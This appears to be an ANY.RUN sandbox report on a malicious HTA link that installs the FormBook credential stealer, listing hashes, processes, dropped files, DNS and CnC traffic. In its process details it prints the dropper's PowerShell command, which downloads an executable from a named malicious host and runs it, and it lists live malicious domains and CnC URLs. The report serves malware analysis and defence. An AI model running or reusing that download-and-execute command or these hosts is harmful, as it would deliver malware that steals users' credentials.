analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

https://canadabestonline.com/hit.hta

Full analysis: https://app.any.run/tasks/c47b280f-edef-478f-b289-f3a709419fcf
Verdict: Malicious activity
Threats:

FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus.

Analysis date: July 11, 2019, 20:32:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
formbook
stealer
Indicators:
MD5:

EB0A4EF1BE9C787E40A2FF9D435BCC40

SHA1:

2840051AC31D4294575CB55D3E64B68E0A1ACB40

SHA256:

F4FD594B6703D45C7CD8B79DD94D1561843111866BD83104E2AEA727693A4D63

SSDEEP:

3:N8ZLEosLIhKNMtNREn:2OLEdtY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3532)
    • Changes the autorun value in the registry

      • cscript.exe (PID: 2840)
    • FORMBOOK was detected

      • explorer.exe (PID: 284)
    • Connects to CnC server

      • explorer.exe (PID: 284)
    • Application was dropped or rewritten from another process

      • hit.exe (PID: 572)
      • hit.exe (PID: 2880)
    • Formbook was detected

      • Firefox.exe (PID: 2984)
      • cscript.exe (PID: 2840)
    • Actions looks like stealing of personal data

      • cscript.exe (PID: 2840)
    • Stealing of credential data

      • cscript.exe (PID: 2840)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 3872)
    • Creates files in the user directory

      • powershell.exe (PID: 3872)
      • powershell.exe (PID: 2436)
      • cscript.exe (PID: 2840)
    • Reads Internet Cache Settings

      • explorer.exe (PID: 284)
    • Starts Internet Explorer

      • explorer.exe (PID: 284)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • powershell.exe (PID: 3872)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2436)
    • Starts CMD.EXE for commands execution

      • cscript.exe (PID: 2840)
      • mshta.exe (PID: 2500)
    • Executes scripts

      • explorer.exe (PID: 284)
    • Application launched itself

      • hit.exe (PID: 572)
    • Loads DLL from Mozilla Firefox

      • cscript.exe (PID: 2840)
  • INFO

    • Manual execution by user

      • notepad.exe (PID: 3216)
      • powershell.exe (PID: 3872)
      • cscript.exe (PID: 2840)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3872)
      • iexplore.exe (PID: 2908)
      • powershell.exe (PID: 2436)
    • Changes internet zones settings

      • iexplore.exe (PID: 2908)
    • Application launched itself

      • iexplore.exe (PID: 2908)
    • Creates files in the user directory

      • iexplore.exe (PID: 3308)
      • Firefox.exe (PID: 2984)
    • Changes settings of System certificates

      • iexplore.exe (PID: 2908)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3308)
    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 2908)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3308)
      • mshta.exe (PID: 2500)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
55
Monitored processes
13
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start iexplore.exe iexplore.exe powershell.exe notepad.exe no specs mshta.exe no specs cmd.exe no specs powershell.exe hit.exe no specs hit.exe no specs #FORMBOOK cscript.exe cmd.exe no specs #FORMBOOK explorer.exe #FORMBOOK firefox.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2908"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3308"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2908 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3872"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
3221225786
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3216"C:\Windows\system32\notepad.exe" C:\Windows\system32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2500"C:\Windows\System32\mshta.exe" "C:\Users\admin\Desktop\hit.hta" C:\Windows\System32\mshta.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3532"C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('https://canadabestonline.com/sure.fdg','%temp%\hit.exe'); Start '%temp%\hit.exe'C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2436powershell (new-object System.Net.WebClienT).DownloadFile('https://canadabestonline.com/sure.fdg','C:\Users\admin\AppData\Local\Temp\hit.exe'); Start 'C:\Users\admin\AppData\Local\Temp\hit.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
572"C:\Users\admin\AppData\Local\Temp\hit.exe" C:\Users\admin\AppData\Local\Temp\hit.exepowershell.exe
User:
admin
Company:
paraders7
Integrity Level:
MEDIUM
Description:
ARNOUX
Exit code:
0
Version:
1.04.0002
2880C:\Users\admin\AppData\Local\Temp\hit.exe" C:\Users\admin\AppData\Local\Temp\hit.exehit.exe
User:
admin
Company:
paraders7
Integrity Level:
MEDIUM
Description:
ARNOUX
Exit code:
0
Version:
1.04.0002
2840"C:\Windows\System32\cscript.exe"C:\Windows\System32\cscript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Console Based Script Host
Version:
5.8.7600.16385
Total events
4 139
Read events
3 051
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
77
Text files
11
Unknown types
4

Dropped files

PID
Process
Filename
Type
2908iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico
MD5:
SHA256:
2908iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3308iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\WNGXXNCX\hit[1].hta
MD5:
SHA256:
3872powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3CWRCEDQCZBFFGRJN6LA.temp
MD5:
SHA256:
2436powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CMM8ENTZ4TNU7VUVYI02.temp
MD5:
SHA256:
3308iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.datdat
MD5:9EF5A2F3ACCB1C7C87F083AB782C775C
SHA256:002F6A8D5C8DEED6E1DB388DDE80EC89D23F9E0BF6508E9E67284427985C8763
2436powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF172df5.TMPbinary
MD5:47388A8B771AD359484FBDBC4C2AF508
SHA256:710A35A9173421C3A0A348EB1AA0D656CB806F93E2E84C36F60FE2ABE570E7F0
2908iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019071120190712\index.datdat
MD5:B89227F3ACA775DAD740F53162853C92
SHA256:AC038355E0641F5528C76ED7C1063E126F4EAA10EF8EC3F819BC7464DF57C105
2436powershell.exeC:\Users\admin\AppData\Local\Temp\hit.exeexecutable
MD5:BFADBD7CD19542C4C45ADFAECA6A2953
SHA256:C503385BB1DCD8FB868FEED328BFE393E75AF7BB8E55A345D7246CADEED48B73
3872powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:B86F99439FDE7995271894C47E047E0B
SHA256:D78A5A34DE1574358E5A6F59336530ECBE2AD4B9147E99EADF942601AE000CF6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
12
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
284
explorer.exe
GET
184.168.221.40:80
http://www.shizaina.com/hx299/?sZU8y8=pq+llpkZHIdEik0oLKMNiPUiEbqCGE3zyi8fYKoLspNS8TpjB8kPlF1bXw54CK57pwTX/w==&3fr8=arfH5hThsV3LpP
US
malicious
284
explorer.exe
POST
198.187.30.187:80
http://www.regular123.com/hx299/
US
malicious
284
explorer.exe
GET
404
198.187.30.187:80
http://www.regular123.com/hx299/?sZU8y8=G3lwFF3lNnew5MpaGSjhtJRlS3aXP9OJe+JtBuFCI1kpU0rUP5SRJWq7zMW3elqxdbXXYA==&3fr8=arfH5hThsV3LpP
US
html
329 b
malicious
284
explorer.exe
POST
198.187.30.187:80
http://www.regular123.com/hx299/
US
malicious
284
explorer.exe
POST
198.187.30.187:80
http://www.regular123.com/hx299/
US
malicious
2908
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2908
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2908
iexplore.exe
162.144.182.73:443
canadabestonline.com
Unified Layer
US
malicious
2436
powershell.exe
162.144.182.73:443
canadabestonline.com
Unified Layer
US
malicious
3308
iexplore.exe
162.144.182.73:443
canadabestonline.com
Unified Layer
US
malicious
3872
powershell.exe
162.144.182.73:443
canadabestonline.com
Unified Layer
US
malicious
284
explorer.exe
184.168.221.40:80
www.shizaina.com
GoDaddy.com, LLC
US
malicious
284
explorer.exe
198.187.30.187:80
www.regular123.com
Namecheap, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
canadabestonline.com
  • 162.144.182.73
unknown
www.centrahydraulics.com
unknown
www.shizaina.com
  • 184.168.221.40
malicious
www.fabioimbraguglia.com
unknown
www.regular123.com
  • 198.187.30.187
malicious
www.softfixin.com
unknown

Threats

PID
Process
Class
Message
284
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] FormBook CnC Checkin (GET)
284
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] FormBook CnC Checkin (GET)
284
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST)
284
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST)
4 ETPRO signatures available at the full report
No debug info